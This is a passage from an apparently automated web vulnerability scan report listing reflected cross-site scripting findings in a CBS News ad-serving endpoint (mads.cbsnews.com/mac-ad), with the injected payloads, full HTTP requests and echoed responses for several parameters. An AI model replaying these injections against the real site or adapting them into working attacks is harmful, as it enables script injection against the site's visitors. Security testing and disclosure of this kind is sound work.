Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:18:02 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS1035b*/alert(1)//41a4215c491&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_
...[SNIP]...

3.553. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload db996<a>240cee9bf0d was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJSdb996<a>240cee9bf0d&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=51611017&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:47 GMT
Server: Apache/2.2
Content-Length: 560
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:18:47 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJSdb996<a>240cee9bf0d&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=51611017&ADREQ&
...[SNIP]...

3.554. http://mads.cbsnews.com/mac-ad [IREFER_HOST parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the IREFER_HOST request parameter is copied into a JavaScript inline comment. The payload 6258b*/alert(1)//82c91614ce5 was submitted in the IREFER_HOST parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=6412397&IREFER_HOST=cbsnews.com6258b*/alert(1)//82c91614ce5&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; s_cc=true; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=cbscbsnewscomatlantisuat%3D%2526pid%253D/Section%252520-%252520Breaking%252520News%252520Headlines-%252520Business%25252C%252520Entertainment%252520%252526%252520World%252520News%252520-%2525202000%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml%25253Ftag%25253Dstack%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:22:21 GMT
Server: Apache/2.2
Content-Length: 1467
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:22:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=6412397&IREFER_HOST=cbsnews.com6258b*/alert(1)//82c91614ce5&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.555. http://mads.cbsnews.com/mac-ad [IREFER_HOST parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the IREFER_HOST request parameter is copied into the HTML document as plain text between tags. The payload 4b776<a>3d8dfa853a3 was submitted in the IREFER_HOST parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com4b776<a>3d8dfa853a3&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:25:14 GMT
Server: Apache/2.2
Content-Length: 600
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:25:14 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com4b776<a>3d8dfa853a3&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCAT='205:' CID='' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:
...[SNIP]...

3.556. http://mads.cbsnews.com/mac-ad [NCAT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload bc4ee*/alert(1)//2071675a5a1 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3Abc4ee*/alert(1)//2071675a5a1&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:23 GMT
Server: Apache/2.2
Content-Length: 1163
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:19:23 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3Abc4ee*/alert(1)//2071675a5a1&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.557. http://mads.cbsnews.com/mac-ad [NCAT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload b4039<a>aed7204e0bc was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=b4039<a>aed7204e0bc&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=66150763&ADREQ&SP=16&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:47 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:19:47 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=b4039<a>aed7204e0bc&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=66150763&ADREQ&SP=16&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS=
...[SNIP]...

3.558. http://mads.cbsnews.com/mac-ad [NODE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the NODE request parameter is copied into a JavaScript inline comment. The payload d03cf*/alert(1)//723e2057d45 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100d03cf*/alert(1)//723e2057d45&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:36 GMT
Server: Apache/2.2
Content-Length: 1141
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:19:36 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100d03cf*/alert(1)//723e2057d45&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.559. http://mads.cbsnews.com/mac-ad [NODE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload 1c035<a>5ae3d95b694 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=2051c035<a>5ae3d95b694&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:22:43 GMT
Server: Apache/2.2
Content-Length: 601
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:22:43 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=2051c035<a>5ae3d95b694&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0"
...[SNIP]...

3.560. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload b3fbc*/alert(1)//15017b280a2 was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b3fbc*/alert(1)//15017b280a2&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:28 GMT
Server: Apache/2.2
Content-Length: 1169
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:18:28 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b3fbc*/alert(1)//15017b280a2&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document
...[SNIP]...

3.561. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 733b2'%3balert(1)//30a8f96e51d was submitted in the PAGESTATE parameter. This input was echoed as 733b2';alert(1)//30a8f96e51d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=733b2'%3balert(1)//30a8f96e51d&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:26 GMT
Server: Apache/2.2
Content-Length: 1170
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:18:26 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=733b2'%3balert(1)//30a8f96e51d&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=13039462327604510
...[SNIP]...
2526&pg=1303946232760451020641252&t=2011.04.27.23.18.26/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />');
;window.CBSI_PAGESTATE='733b2';alert(1)//30a8f96e51d';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw2.cnet.com::1712515392 2011.04.27.23.18.26 *//* MAC T 0.0.3.3 */

3.562. http://mads.cbsnews.com/mac-ad [POS parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload 5edfd<a>d2caf2e3089 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=1005edfd<a>d2caf2e3089&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:48 GMT
Server: Apache/2.2
Content-Length: 613
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:20:48 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=1005edfd<a>d2caf2e3089&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='80' CNET-PTYPE='00' POS='1005edfdad2caf2e3089' NCAT='100:' CNET-PARTNER-ID='1' DVAR_PSID=''
...[SNIP]...

3.563. http://mads.cbsnews.com/mac-ad [POS parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the POS request parameter is copied into a JavaScript inline comment. The payload 1bf6e*/alert(1)//ce66f7f1f1c was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=34303121&ADREQ&SP=110&POS=1001bf6e*/alert(1)//ce66f7f1f1c&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:53 GMT
Server: Apache/2.2
Content-Length: 691
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:20:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=34303121&ADREQ&SP=110&POS=1001bf6e*/alert(1)//ce66f7f1f1c&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='110' CNET-PTYPE='00' POS='1001bf6e*' NCAT='100:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO _RGR
...[SNIP]...

3.564. http://mads.cbsnews.com/mac-ad [PTYPE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload c8455*/alert(1)//0f74d6e8d39 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000c8455*/alert(1)//0f74d6e8d39&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:49 GMT
Server: Apache/2.2
Content-Length: 1142
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:19:49 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000c8455*/alert(1)//0f74d6e8d39&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.565. http://mads.cbsnews.com/mac-ad [PTYPE parameter] previous next

Summary

Severity:	High
